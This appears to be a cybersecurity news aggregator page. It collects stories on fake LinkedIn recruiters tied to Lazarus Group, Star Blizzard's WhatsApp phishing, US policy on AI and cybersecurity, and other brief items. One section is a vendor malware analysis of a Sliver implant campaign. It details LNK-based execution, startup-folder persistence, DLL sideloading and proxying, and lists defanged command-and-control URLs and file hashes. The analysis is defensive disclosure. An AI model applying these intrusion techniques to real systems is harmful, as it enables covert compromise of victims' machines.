For many professionals, LinkedIn is a lifeline—a platform to connect, grow, and land the next big opportunity. But for some unsuspecting job seekers, it’s becoming a minefield of cyber threats. Take John Carlo Galvez, for example. His LinkedIn profile paints the picture of a polished recruiter with connections to top-tier organizations. A smiling profile photo adds to the credibility. But here’s the catch—John isn’t real. Neither are Margaret Blackmore or Sally Redaza, two other supposed “recruiters” on the platform. Behind these profiles lies something far more sinister: North Korea’s notorious Lazarus Group. Known for their cyber espionage and high-profile attacks, this Advanced Persistent Threat (APT) group has now infiltrated LinkedIn to target professionals worldwide. Cybersecurity researcher Dominic Alvieri brought this worrying development to light in a LinkedIn post, urging users to stay vigilant. A Polished Facade, A Dangerous Trap Scrolling through John Carlo Galvez’s LinkedIn profile, there’s nothing out of place at first glance. He claims to be recruiting for major firms, complete with a list of tempting job offers. But those who take the bait quickly find themselves entangled in a web of deceit. Cybersecurity expert who flagged the fake accounts believes these profiles are meticulously crafted to appear genuine. They’re not just targeting individuals with run-of-the-mill scams; instead, they focus on professionals in cryptocurrency and financial sectors. The group uses names like Binance, Ripple, YouHodler, and Bitget to add legitimacy to their lures. How It Works: The Recruitment Ruse Imagine receiving a LinkedIn message from a recruiter who seems to have the perfect job for you. The role aligns with your experience, offers a lucrative salary, and even promises remote work flexibility. Excited, you click on the job description link—only to unknowingly download malware. From there, the attackers have access to your device, files, and potentially your employer’s network. These operations are not about stealing one person’s data; they’re designed to infiltrate organizations and carry out large-scale attacks. Europol, the U.S. Department of Justice, and the FBI have all raised red flags about Lazarus Group’s evolving tactics. Their ability to blend into professional spaces like LinkedIn is a chilling reminder that no platform is immune to cyber threats. The Human Cost For job seekers, especially those in industries hit hard by layoffs, the emotional toll of such scams can be devastating. Imagine pinning your hopes on a dream job, only to discover you’ve fallen victim to a scam that compromises not only your personal data but also your professional reputation. One victim, who wished to remain anonymous, shared their story: “It started with a simple LinkedIn message. They sounded so genuine, asking about my skills and career goals. But when I clicked on the job link, everything changed. My laptop froze, and within minutes, my email and LinkedIn accounts were locked. It felt like my world came crashing down.” These attacks prey on people’s trust, a critical factor in professional networking. For many, the experience leaves them feeling betrayed and wary of opportunities that once seemed promising. Staying Safe: What You Can Do While LinkedIn remains a valuable tool for career growth, users must be vigilant. Here are some tips to protect yourself from falling victim to such scams: Scrutinize Profiles: Look for inconsistencies in the recruiter’s profile. Check their work history, connections, and activity. Fake profiles often have limited information and generic job titles. Verify Job Offers: If a recruiter mentions working with a company like Binance or Ripple, cross-check their affiliation through official company channels. Be Cautious with Links: Never click on job description links or attachments from unknown sources. When in doubt, type the company’s official website URL directly into your browser. Ask Questions: Don’t be afraid to challenge the recruiter. Genuine professionals will welcome questions about the role, company, or hiring process. Enable Two-Factor Authentication: Secure your LinkedIn and email accounts with two-factor authentication to prevent unauthorized access. LinkedIn’s Role in the Fight LinkedIn has previously stated its commitment to combating fake profiles, but the platform’s size and global reach make this a daunting challenge. Users are encouraged to report suspicious accounts to LinkedIn’s security team, helping the platform identify and remove malicious actors. For now, staying informed and vigilant remains the best defense against such threats. So, next time you receive a message from a recruiter, remember: not everything is as it seems. Ask questions, verify details, and think twice before clicking that link. Because when it comes to cybersecurity, a little caution can go a long way.

by The Cyber Express

PowerShell arrays support dynamic operations like adding, modifying, or removing elements, and can also be filtered and manipulated using advanced techniques like slicing, joining, and looping through array items.

by ITPro Today

The financially-motivated hacker was previously linked to the mass exploitation of critical vulnerabilities in MOVEit file-transfer software.

by Cybersecurity Dive

IT leaders and industry insiders share their cloud computing and edge computing trends and predictions for 2025.

by ITPro Today

After researchers and national cybersecurity agencies revealed key details of Russia-linked Star Blizzard threat actor in recent days, the group adds a new attack vector to its arsenal that targeted victims’ WhatsApp data. Microsoft''s Threat Intelligence team spotted the campaign late last year, leveraging the topic of support to Ukrainian NGOs in the face of the ongoing war. Star Blizzard, also tracked as Callisto, SEABORGIUM, or COLDRIVER, is run by Russia’s FSB or secret service officers, according to previous attribution. The group is famously known for its targeted spear-phishing campaigns against high profile targets in the U.S. and U.K., where they have targeted dozens of journalists, think tanks, and non-governmental organizations that support Ukraine and its allies. Also read: Russia Backed Star Blizzard’s Infiltration Attempts in UK Elections Laid Bare Star Blizzard Shifts Focus to WhatsApp Data Historically, the threat actor is known to use phishing campaigns for initial infection. But detailed advisories from independent cybersecurity firms like Microsoft’s Threat Intelligence team and agencies like the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which exposed the TTPs of this threat actor has likely forced them to change its tradecraft to evade detection. Star Blizzard has now modified it spear-phishing campaign to target the WhatsApp accounts of its victims rather than their computer data. This is the first time that the threat actor has adopted a new technique, researchers said. The threat actor initiates contact via email, engaging targets before sending a follow-up email with a malicious link. The sender address impersonates a U.S. government official, consistent with Star Blizzard’s tactic of mimicking political or diplomatic figures to boost credibility. [caption id=""attachment_100284"" align=""aligncenter"" width=""1024""] Image: Initial Spear-Phishing mail from Star Blizzard (Credit: MSTIC)[/caption] The initial email includes a QR code claiming to direct users to a WhatsApp group focused on supporting Ukraine NGOs. However, the QR code is intentionally broken to prompt the recipient to respond. Upon response, the threat actor sends a second email containing a Safe Links-wrapped t[.]ly shortened link as an alternative to join the group. Following this link redirects the target to a page instructing them to scan a QR code to join the group. In reality, the QR code connects the victim’s WhatsApp account to the threat actor’s device via WhatsApp Web. This grants the attacker access to the victim’s messages, enabling data exfiltration through browser plugins designed for exporting WhatsApp messages. Microsoft noted that although the campaign ended in November 2024, people and organizations, especially those related to the government or diplomacy, defense, research and assistance to Ukraine in the ongoing conflict with Russia, need to be vigilant and educated of these change in tactics. “We are sharing our information on Star Blizzard’s latest activity to raise awareness of this threat actor’s shift in tradecraft and to educate organizations on how to harden their attack surfaces against this and similar activity,” Microsoft said.

by The Cyber Express

Key Takeaways Cyble Research and Intelligence Labs (CRIL) has identified an ongoing cyberattack - targeting organizations in Germany. The attack is initiated through a deceptive LNK file embedded within an archive. When executed by an unsuspecting user, this LNK file triggers cmd.exe to copy and run wksprt.exe, a legitimate executable. This executable sideloads a malicious DLL that employs DLL proxying, ensuring the host application continues to operate seamlessly while executing malicious shellcode in the background. The shellcode ultimately decrypts and executes the final payload: Sliver, a well-known open-source Red Team/adversary emulation framework. Once deployed, Sliver functions as an implant, enabling threat actors to establish communication with the compromised system and conduct further malicious operations, thereby enhancing their control over the infected network. Overview Cyble Research & Intelligence Labs (CRIL) recently identified an ongoing campaign involving an archive file containing a deceptive LNK file. While the initial infection vector remains unclear, this attack is likely initiated via spear-phishing email. The archive file ""Homeoffice-Vereinbarung-2025.7z,"" once extracted, contains a shortcut (.LNK) file along with several other components, including legitimate executables (DLL and EXE files), a malicious DLL file, an encrypted DAT file, and a decoy PDF. Interestingly, the creation times of most files in the archive are about a year old, with only the lure document being recently created. This suggests that the Threat Actor (TA) has not updated their core components, opting instead to introduce a new lure document to maintain the campaign''s relevance. Upon execution, the LNK file triggers the opening of a decoy document, masquerading as a Home Office Agreement. This document serves as a lure to deceive the user. Concurrently, the LNK file also executes a legitimate executable, which subsequently performs DLL sideloading. The legitimate executable loads the malicious DLL, which is designed to retrieve and decrypt the shellcode from the DAT file stored in the same extracted archive. This entire process occurs entirely in memory, enabling the attack to evade detection by security products. The shellcode is designed to decrypt and execute an embedded payload, a Sliver implant—an open-source red teaming and command and control framework employed by the TA for further malicious actions. Upon execution, the implant establishes connections to specific remote servers/endpoints, enabling the TA to conduct additional malicious operations on the victim''s system. The figure below provides an overview of the infection process. Figure 1 - Infection chain Technical Details The attack begins once the victim extracts an archive file, likely delivered via an email attachment, containing several files: IPHLPAPI.dll – malicious DLL file IPHLPLAPI.dll – renamed legitimate IPHLPAPI.DLL ccache.dat – Contains Encrypted Shellcode wksprt.lnk  - Shortcut file to load wksprt file 00_Homeoffice-Vereinbarung-2025.pdf – Lure document Homeoffice-Vereinbarung-2025.pdf.lnk – Main shortcut file However, only Homeoffice-Vereinbarung-2025.pdf.lnk, disguised as a PDF, is visible, while the other files remain hidden. When the user runs this LNK file, it triggers cmd.exe to execute a series of commands, copying files to specific directories and performing additional tasks. The image below shows the command embedded in the LNK file. Figure 2 - Contents of the .LNK file Following the execution of the LNK file, a directory named “InteI” is created within the user''s local app data folder (%localappdata%\InteI). A legitimate Windows file, wksprt.exe, from C:\Windows\System32 is then copied into this newly created InteI directory. Subsequently, the hidden files IPHLPAPI.dll, IPHLPLAPI.dll, and ccache.dat are copied into the “InteI” directory, with their hidden attributes preserved. To establish persistence on the victim''s machine, wksprt.lnk, one of the files from the extracted folder, is copied to the Startup folder (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\). This LNK file is designed to execute wksprt.exe, which has been copied to the “InteI” directory, ensuring that the executable runs automatically upon system startup. Figure 3 - Command line parameters of LNK file Before the final step, the decoy file “00_Homeoffice-Vereinbarung-2025.pdf” is executed to maintain the appearance of a legitimate document being opened. Figure 4 - Lure document The lure document is a Home Office Agreement (Homeoffice-Vereinbarung) written in German, serving as a supplementary agreement to an existing employment contract between an organization and an employee, outlining the terms for remote work. Based on the content of this lure document, we believe this campaign is designed to target individuals or organizations in Germany. Furthermore, the initial .7z file was observed to have been uploaded to VirusTotal from a German location, supporting this assessment. Finally, wksprt.exe is launched from the “InteI” directory to carry out further actions. The malicious DLL file has a very low detection rate, as shown below. Figure 5 - Low Detection rate of Malicious DLL file DLL Sideloading and DLL Proxying: The legitimate executable wksprt.exe sideloads a malicious DLL (IPHLPAPI.dll) from the current directory. The malicious IPHLPAPI.dll then loads a slightly renamed legitimate DLL (IPHLPLAPI.dll), designed to appear authentic. Both DLLs export the same functions, as shown below. Figure 6 - Export functions of both DLLs The malicious DLL acts as a proxy, intercepting function calls from the executable and forwarding them to the legitimate DLL, which contains the actual implementation of the function, as shown below. Figure 7 – DLL proxying The forwarding of function calls ensures that the application maintains its normal behavior while allowing the malicious DLL to execute its own code. In addition, the malicious DLL spawns a new thread to read the contents of the file ccache.dat, as shown below. Figure 8 - Reading the encrypted content from the .dat file After the ""ccache.dat"" file''s content is read, the malicious thread decrypts the malicious data. It employs the following cryptographic APIs for key generation and decryption: CryptAcquireContextW CryptCreateHash CryptHashData CryptDeriveKey CryptDecrypt The thread now copies the decrypted content to the newly allocated memory and executes it. The figure below shows the decrypted content of “ccache.dat” and the control transfer to the decrypted content. Figure 9 - Decrypted content The decrypted content is a shellcode that runs another decryption loop to retrieve the actual payload embedded within it, as shown below. Figure 10 - Final payload The shellcode is designed to execute the embedded Sliver implant—an open-source red teaming framework used for malicious purposes by the TAs. Once executed, the implant connects to the following endpoints to carry out additional activities on the victim''s system. hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.html hxxp://www.technikzwerg[.]de/auth/auth/authenticate/samples.php Attribution While we cannot definitively attribute this campaign to any specific group at this point, the initial infection vector, stager DLL behavior, shellcode injection, and Sliver framework exhibit patterns typically associated with APT29 in past campaigns. Additionally, this group has frequently employed the DLL sideloading technique in its operations. However, the most recent sample analyzed introduces DLL proxying, a technique not previously observed in APT29''s campaigns. [Update 21st January - 2025]While these similarities are noteworthy, further investigation is needed before any definitive attribution can be made. Conclusion This campaign targets organizations in Germany by impersonating an employee agreement for remote working. Using this lure, the threat actors deploy a deceptive LNK file and malicious components to gain an initial foothold on the victim''s system, leading to its compromise and further exploitation. By employing advanced evasion techniques such as DLL sideloading, DLL proxying, shellcode injection, and the Sliver framework, the attackers effectively bypass traditional security measures. This multi-stage cyberattack highlights the increasing sophistication and adaptability of threat actors, underscoring the growing complexity of APT operations and the urgent need for enhanced detection and defense strategies. Yara and Sigma rules to detect this campaign are available for download from the linked Github repository.   Our Recommendations The initial breach may occur via spam emails. Therefore, it’s advisable to deploy strong email filtering systems to identify and prevent the dissemination of harmful attachments. Exercise caution when handling email attachments or links, particularly those from unknown senders. Verify the sender’s identity, particularly if an email seems suspicious. Use application whitelisting to prevent unauthorized execution of LNK files and other suspicious components. Deploy Endpoint Detection and Response (EDR) solutions to identify and block malicious behaviors, such as DLL sideloading and shellcode injection. Monitor for anomalous network activities, such as unexpected outbound connections, to detect Sliver framework-related activities. MITRE ATT&CK® Techniques Tactic Technique Procedure Initial Access (TA0001) Phishing (T1566) The archive file may be delivered through phishing or spam emails Execution  (TA0002)  Command and Scripting  Interpreter (T1059)  TAs abuse command and script interpreters to execute commands Persistence (TA0003)  Registry Run Keys / Startup  Folder (T1547.001 Creates persistence by  adding a lnk to a startup folder Privilege  Escalation  (TA0004)   Hijack Execution Flow:  DLL Side-Loading (T1574.002)  Execute malicious Dll using Dll Sideloading  Defense Evasion (TA0005)  Obfuscated Files or  Information (T1027.002) Binary includes encrypted data Command and Control (TA0011) Application Layer Protocol: Web Protocols (T1071.001)  Implant communicates with its C&C server Indicators of Compromise (IOCs) Indicators  Indicator Type Description 83a70162ec391fde57a9943b5270c217d63d050aae94ae3efb75de45df5298be SHA-256 Archive File f778825b254682ab5746d7b547df848406bb6357a74e2966b39a5fa5eae006c2 SHA-256 LNK file 9b613f6942c378a447c7b75874a8fff0ef7d7fd37785fdb81b45d4e4e2d9e63d SHA-256 Malicious DLL 86f8a979bd887955f0491a0ed5e00de2f3fe53e6eb5856fb823115ce43b7c0ca SHA-256 Encrypted .dat file References https://lab52.io/blog/2162-2/https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdfhttps://www.ired.team/offensive-security/persistence/dll-proxying-for-persistence The post Sliver Implant Targets German Entities with DLL Sideloading and Proxying Techniques appeared first on Cyble.

by CYBLE

Overview Outgoing U.S. President Joe Biden issued an order yesterday outlining measures to improve government cybersecurity. The lengthy order includes suggestions to improve cloud and software security by building requirements into the federal acquisition process. It also orders federal agencies to adopt a number of cybersecurity technologies and practices and takes a forward-thinking approach to AI. As the culmination of efforts that began nearly four years ago in response to the Colonial Pipeline ransomware attack, the order is also valuable as a “lessons learned” document from an Administration that has had much to deal with in four years of dramatic cybersecurity events. Cloud, Software Security Goals Biden’s final cybersecurity plan is also ambitious in its implementation timeline, as many of the initiatives would be completed within a year. The lead federal agencies would develop contract language requiring software providers to attest and validate that they use secure software development practices. Open-source software would also be included in the plans, as agencies would be given guidance on security assessments and patching, along with best practices for contributing to open-source projects. Federal government contractors would be required to follow minimum cybersecurity practices identified by NIST “when developing, maintaining, or supporting IT services or products that are provided to the Federal Government.” Cloud service providers that participate in the FedRAMP Marketplace would create “baselines with specifications and recommendations” for securely configuring cloud-based systems to protect government data. IAM, Post-Quantum Encryption Goals Federal agencies would be required to “adopt proven security practices” to include in identity and access management (IAM) practices. Pilot tests for commercial phishing-resistant standards such as WebAuthn would be conducted to help those authentication efforts. The Biden plan says post-quantum cryptography (PQC) – in at least a hybrid format – should be implemented “as soon as practicable upon support being provided by network security products and services already deployed” in government network architectures. The plan also requires secure management of access tokens and cryptographic keys used by cloud service providers and encryption of DNS, email, video conferencing, and instant messaging traffic. CISA would lead the development of “the technical capability to gain timely access” to data from agency EDR solutions and security operation centers (SOCs) to enable rapid threat hunting. BGP’s security flaws are also addressed, with requirements that ISPs implement routing security measures such as Route Origin Authorizations, Route Origin Validation, route leak mitigation, and source address validation. AI Cybersecurity Innovation The executive order says AI “has the potential to transform cyber defense by rapidly identifying new vulnerabilities, increasing the scale of threat detection techniques, and automating cyber defense. The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity.” AI cybersecurity implementation would start with a pilot program on the use of AI to improve critical infrastructure security in the energy sector. That program may gauge the effectiveness of AI technologies in detecting vulnerabilities, automating patch management, and identifying malicious threats. The Department of Defense would start its own program on the use of “advanced AI models for cyber defense.” The order asks science and research agencies to prioritize research on AI cybersecurity that meets the following criteria: Human-AI interaction methods to assist with defensive cyber analysis AI coding security assistance, including the security of AI-generated code Designing secure AI systems Methods for “prevention, response, remediation, and recovery of cyber incidents involving AI systems.” Conclusion Biden’s cybersecurity order is the culmination of four years which began even before the Colonial Pipeline incident with the SolarWinds software supply chain attack. The order includes longer-term goals, including a three-year plan for modernizing federal information systems, networks, and practices, with a focus on zero-trust architectures, EDR capabilities, encryption, network segmentation, and phishing-resistant multi-factor authentication. The post AI Takes the Center Stage in Biden’s Landmark Cybersecurity Order appeared first on Cyble.

by CYBLE

Kaspersky experts analyzed the Mercedes-Benz head unit, its IPC protocols and firmware, and found new vulnerabilities via physical access.

by Securelist

Silverfort has discovered that a misconfiguration can bypass an Active Directory Group Policy designed to disable NTLMv1, allowing…

by Hackread

With the tech talent shortage, organizations are having a tough time hiring and retaining the right talent. Employee experience matters greatly.

by ITPro Today

Austrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users'' data to China. The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data

by The Hacker News

The U.S. has continued its crackdown against North Korean IT worker scams with sanctions against the country''s government weapons trading office Department 53 and its Laos-based front companies Korea Osong Shipping and Chonsurim Trading Corporation and their respective leaders, as well as China-based Liaoning China Trade Industry.

by SC Media

Traditional observability tools fall short in capturing Kubernetes'' complexity; modern solutions must go beyond metrics and logs to deliver proactive, holistic management of cloud-native environments.

by ITPro Today

The agency’s declaratory ruling took effect Thursday, but the future outlook of that effort and a separate proposed rule remain uncertain under the incoming administration.

by Cybersecurity Dive

Archana Venugopal has taken to LinkedIn to announce her appointment as Senior Vice President & Chief Information Security Officer (CISO) at the National Commodity & Derivatives Exchange Limited (NCDEX). This new role positions her at the forefront of cybersecurity leadership in one of India’s leading commodity exchanges. Established in 2003, NCDEX is a professionally managed online commodity exchange with a diverse portfolio of agricultural and non-agricultural derivatives. The exchange has played a pivotal role in setting benchmarks for the derivatives segment in India. Incorporated as a public limited company on April 23, 2003, NCDEX commenced operations on December 15, 2003, under the Forward Contracts (Regulation) Act, 1952. In 2015, the exchange transitioned into a deemed recognized stock exchange under the Securities Contracts (Regulation) Act, 1956, and is regulated by the Securities and Exchange Board of India (SEBI). Archana Venugopal’s Vision for Cybersecurity at NCDEX Venugopal, an accomplished cybersecurity professional, expressed excitement about taking on this leadership role. In her LinkedIn post, she emphasized her focus on crafting strong cybersecurity strategies, enhancing digital infrastructure, ensuring compliance with evolving regulations, and fostering a culture of innovation and resilience within NCDEX’s operations. She outlined key areas of her role, which include: Identifying and mitigating emerging cyber threats. Implementing advanced security technologies to safeguard operations. Strengthening incident response capabilities to manage potential security breaches effectively. Working closely with the Chief Risk Officer (CRO) and the Managing Director & Chief Executive Officer (MD & CEO) of the exchange, Venugopal will ensure that NCDEX remains at the cutting edge of cybersecurity practices, essential for an organization that handles sensitive financial data and supports critical national infrastructure. A Legacy of Leadership in Cybersecurity Before joining NCDEX, Venugopal served as the Chief Information Security Officer at ESAF Bank, where she led various initiatives to secure the bank’s operations. Her career portfolio also includes leadership roles at Gulf Bank, Deloitte India, and South Indian Bank. Her extensive experience in cybersecurity and financial sectors has equipped her with the expertise needed to address the unique challenges of securing commodity exchange platforms, where both physical and digital risks converge. Advocating for Diversity and Inclusion In addition to her technical expertise, Venugopal is a passionate advocate for diversity and inclusion in the technology and cybersecurity sectors. As a woman in STEM, she has experienced the challenges and rewards of breaking barriers in a male-dominated field. “I carry immense pride in being part of the growing community of women leaders driving change in these industries,” Venugopal shared in her LinkedIn announcement. “I hope my journey encourages more women to break barriers and embrace leadership roles in tech and beyond.” Venugopal plans to use her platform at NCDEX to champion greater representation of women in STEM and cybersecurity roles. She is deeply committed to mentoring aspiring professionals, particularly women, and encouraging them to explore leadership opportunities. Mentorship and Empowerment Venugopal’s dedication to mentorship is a cornerstone of her leadership philosophy. She aims to empower women in cybersecurity by fostering confidence, sharing her knowledge, and creating a supportive environment for professional growth. Through her efforts, she seeks to inspire the next generation of leaders to: Break barriers and challenge stereotypes. Embrace innovation and take on leadership roles in technology. Drive meaningful change in the cybersecurity landscape. By advocating for a more inclusive and equitable future in technology, Venugopal is contributing to a cultural shift that values diversity as a catalyst for innovation and resilience. A Promising Future for NCDEX Archana Venugopal’s appointment as Senior Vice President & Chief Information Security Officer at NCDEX marks a new chapter for both her career and the exchange’s cybersecurity journey. Her wealth of experience and her commitment to mentorship and diversity positions her as a transformative leader in the cybersecurity industry. As she takes on this role, Venugopal’s efforts will undoubtedly contribute to fortifying NCDEX’s digital infrastructure, fostering innovation, and inspiring future leaders in the field of cybersecurity.

by The Cyber Express

Included in the data exposed by the server were personally identifiable information, job application forms, Security Industry Authority cards, payroll details, TrustID validated documents, and invoices from up to two decades ago, according to independent security researcher JayeLTee.

by SC Media

Infiltration of Wolf Haldenstein''s systems facilitated the compromise of individuals'' full names, Social Security numbers, employee identification numbers, medical diagnoses, and medical claim details, none of which has been misused so far, said the law office in a data breach notice detailing that investigation into the extent of the breach only concluded early last month.

by SC Media

Shopping for OT systems? A new CISA guide outlines OT cyber features to look for. Meanwhile, the U.S. government publishes a playbook for collecting AI vulnerability data. Plus, a White House EO highlights AI security goals. And get the latest on IoT security; secure app dev; and tougher HIPAA cyber rules.Dive into six things that are top of mind for the week ending Jan. 17.1 - How to choose cybersecure OT productsIs your organization evaluating operational technology (OT) products for purchase? If so, a new guide from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) aims to help OT operators choose OT products designed with strong cybersecurity features.The publication, titled “Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products,” highlights 12 cybersecurity elements that OT products should have, including:Support for controlling and tracking modifications to configuration settingsLogging of all actions using open-standard logging formatsRigorous testing for vulnerabilities and timely provision of free and easy-to-install patches and updatesStrong authentication methods such as role-based access control and phishing-resistant multi-factor authentication to prevent unauthorized accessProtection of the integrity and confidentiality of data at rest and in transitAccording to CISA, many OT products aren’t designed and developed securely, so they ship with security issues such as weak authentication, known vulnerabilities and insecure default settings. In fact, the agency says it’s common for hackers to target handpicked OT products instead of going after specific organizations. Thus, it’s critical for organizations, especially those in critical infrastructure sectors, to pick OT products built securely by using CISA’s “Secure by Design” principles.“When security is not prioritized nor incorporated directly into OT products, it is difficult and costly for owners and operators to defend their OT assets against compromise,” reads the guide, published in collaboration with other U.S. and international agencies.For more information about OT systems cybersecurity, check out these Tenable resources: “What is operational technology (OT)?” (guide)“Discover, Measure, and Minimize the Risk Posed by Your Interconnected IT/OT/IoT Environments” (on-demand webinar)“How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)“Blackbox to blueprint: The security leader’s guidebook to managing OT and IT risk” (white paper)“OT Security Master Class: Understanding the Key Principles, Challenges, and Solutions” (on-demand webinar)2 - JCDC publishes playbook to collect AI security info A new playbook published by the U.S. government aims to facilitate the collective, voluntary sharing of information among AI providers, developers and users about AI vulnerabilities and cyber incidents.The “AI Cybersecurity Collaboration Playbook” from CISA’s Joint Cyber Defense Collaborative (JCDC) details ways in which AI community members in government and in the private sector – both in the U.S. and abroad – can collaborate to help boost AI security for everybody.“The development of this playbook is a major milestone in our efforts to secure AI systems through active collaboration,” CISA Director Jen Easterly said in a statement.AI systems introduce unique cybersecurity challenges which make them vulnerable to attacks including model poisoning, data manipulation and malicious inputs. “These vulnerabilities, coupled with the rapid adoption of AI systems, demand comprehensive strategies and public-private partnership to address evolving risks,” the 33-page playbook reads.By collecting, analyzing and enriching information on AI vulnerabilities and cyber incidents, CISA would be able to help the AI community in a variety of ways, including by:Sharing information to improve detection and prevention of AI threatsExposing attackers’ tactics and infrastructureIdentifying and notifying victimsGenerating threat advisories and intelligence reportsOffering tailored recommendations, vulnerability management strategies and cyber defense best practicesThe playbook’s target audience is operational cybersecurity professionals, including incident responders and security analysts, and its goal is to help them collaborate and share information with CISA and JCDC about AI security.In addition, CISA also envisions organizations adopting the document’s guidance internally “to enhance their own information-sharing practices, contributing to a unified approach to AI-related threats across critical infrastructure.”For more information about industry efforts for collaborating on AI security:Cloud Security Alliance’s “AI Safety Initiative”MITRE’s “AI Incident Sharing initiative”Open Worldwide Application Security Project’s “AI Exchange”U.S. government’s “Testing Risks of AI for National Security (TRAINS) Taskforce”3 - New White House cybersecurity EO includes AI requirementsThe Biden Administration issued a sweeping cybersecurity executive order (EO) this week aimed at boosting U.S. cyberdefenses, and AI security is one area that it says must be strengthened.The “Executive Order on Strengthening and Promoting Innovation in the Nation’s Cybersecurity” calls for promoting security “with and in” AI, saying it can speed up the identification of new vulnerabilities, scale up threat detection and automate cyberdefenses.“The Federal Government must accelerate the development and deployment of AI, explore ways to improve the cybersecurity of critical infrastructure using AI, and accelerate research at the intersection of AI and cybersecurity,” the executive order reads.Among the executive order’s requirements for AI are:Launching a pilot program on using AI to improve cyberdefense of critical infrastructure in the energy sector. The Secretaries of Energy, Defense and Homeland Security would be in charge of the program, in collaboration with private-sector critical infrastructure organizations. The program may include:vulnerability detectionautomatic patch managementidentification and categorization of anomalous and malicious activity across IT or OT systemsThe Secretary of Defense must establish a program to use advanced AI models for cyberdefense.The Secretaries of Commerce, Energy and Homeland Security, and the National Science Foundation Director, must prioritize funding for their respective programs that encourage the development of “large-scale, labeled datasets needed to make progress on cyber defense research.”The Secretaries of Defense and Homeland Security, and the Director of National Intelligence must incorporate management of AI software vulnerabilities and compromises into their agencies’ process and “and interagency coordination mechanisms for vulnerability management.” These efforts should include incident tracking, response, reporting and sharing AI systems’ indicators of compromise.These AI-related actions all must be completed at various dates during 2025.The executive order covers multiple other areas. To get all the details and expert analysis, read our blog “New Cybersecurity Executive Order: What It Means for Federal Agencies” from Robert Huber, Tenable’s Chief Security Officer, Head of Research and President of Tenable Public Sector.4 - CISA publishes secure software development best practicesSoftware makers interested in improving the security of their development process and of their products have fresh guidance to peruse.As part of its “Secure by Design” program, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published cybersecurity recommendations for protecting organizations’ software development lifecycle.The best practices are organized into two categories — Software development process goals; and Product design goals — and include:Software development process goals:Address vulnerabilities before releasing the software product, and publish a vulnerability disclosure policy.Separate all software development environments, including development, build and test, to reduce the lateral movement risk.Enforce multi-factor authentication across all software development environments.Securely store and transmit credentials.Product design goalsReduce entire classes of preventable vulnerabilities, such as SQL injection vulnerabilities, memory safety vulnerabilities and cross-site scripting vulnerabilities.Provide timely security patches to customers.Don’t use default password in your products.Let users know when your products are nearing end-of-life status and you will no longer provide security patches for them.The recommendations “will help to protect the sector from cyber incidents, identify and address vulnerabilities prior to product release, improve incident response, and significantly improve software security,” reads a CISA statement.To get more details, read the full “Information Technology (IT) Sector-Specific Goals (SSGs)” fact sheet.For more information about secure software development:“CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills” (Tenable)“Secure Development” (Software Engineering Institute, Carnegie Mellon Univ.)“Secure Software Development Framework” (NIST)“Secure development and deployment guidance” (UK NCSC)“OWASP Developer Guide” (Open Worldwide Application Security Project )5 - U.S. gov’t launches security label for IoT productsTo encourage the development of safer internet of things (IoT) devices for consumers, the U.S. government has introduced a new label for IoT products that meet National Institute of Standards and Technology (NIST) cybersecurity standards.Called the U.S. Cyber Trust Mark, the label will also help U.S. consumers know which IoT products are more secure, as they shop for internet-connected ware, such as baby monitors, security cameras, refrigerators, garage door openers and thermostats.“These devices are part of Americans’ daily lives. But Americans are worried about the rise of criminals remotely hacking into home security systems to unlock doors, or malicious attackers tapping into insecure home cameras to illicitly record conversations,” reads a White House statement.IoT manufacturers will soon be able to seek the U.S. Cyber Trust Mark label by submitting their IoT products to accredited labs for testing. Tests will cover areas including password authentication, data protection, software updates and incident detection. IoT products that earn the label will also have a QR code that’ll link consumers to information such as:How to change default passwordsHow to configure the device securelyHow to access software updates and patches if they’re not delivered automaticallyThe end date of the product’s support periodParticipation in the U.S. Cyber Trust Mark program is voluntary for IoT manufacturers. IoT devices excluded from the program include motor vehicles, medical devices, and products used for manufacturing, industrial control and enterprise applications.To get more details, visit the U.S. Cyber Trust Mark home page.For more information about securing consumer IoT devices, check out resources from the IoT Security Foundation; the European Telecommunications Standards Institute; TechAccord; Internet Society; the U.K. National Cyber Security Centre; and the International Organization for Standardization (ISO). 6 - U.S. gov’t seeks tougher cybersecurity rules for health providersDoctors, hospitals, health insurers and other healthcare organizations may face stricter cybersecurity regulations in the U.S.That’s because the U.S. government is seeking to tighten the cybersecurity requirements in the Health Insurance Portability and Accountability Act (HIPAA).The new cybersecurity rules proposed by the Department of Health and Human Services (HHS) include:Develop and revise on an ongoing basis a technology asset inventory and a network map that illustrates the movement of electronic protected health information (ePHI) throughout the organization’s electronic information systems.Make risk analysis more specific by submitting written assessments that include:A review of the technology asset inventory and network mapReasonably anticipated threats to ePHI’s confidentiality, availability and integrityPotential vulnerabilities to the organization’s electronic information systemsA risk-level assessment of identified threats and vulnerabilitiesStrengthen contingency planning and security incident response with steps including:Draft written plans to restore certain electronic information systems and data within 72 hours.Prioritize restoration by analyzing criticality of systems and tech assets.Outline in writing how employees and the organization will respond to known or suspected security incidents.Conduct an audit at least once per year to ensure the organization’s compliance with HIPAA’s cybersecurity rules.With limited exceptions, encrypt ePHI at rest and in transit and require the use of multi-factor authentication.Conduct vulnerability scanning at least every six months, and penetration testing at least once a year.For more details about HHS’ new proposed HIPAA cybersecurity rules and to submit public comments about them, go to the Federal Register’s “HIPAA Security Rule To Strengthen the Cybersecurity of Electronic Protected Health Information” page. The comment period ends on March 7, 2025.

by Tenable

by ComputerWeekly

The BlackSuit ransomware group, a successor to the infamous Royal ransomware, has rapidly established itself as a prominent cyber threat since its emergence in mid-2023. Leveraging advanced tactics, techniques, and procedures (TTPs), BlackSuit employs a multifaceted approach that includes phishing, RDP exploitation, and double extortion to target high-value organizations worldwide. With over $500 million in ransom demands and attacks on industries ranging from education to automotive, BlackSuit showcases evolving ransomware capabilities. 

by Picus Security

